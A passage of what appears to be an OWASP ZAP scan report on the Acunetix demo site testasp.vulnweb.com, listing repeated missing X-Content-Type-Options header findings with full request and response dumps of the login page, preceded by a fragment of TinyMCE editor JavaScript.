targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> 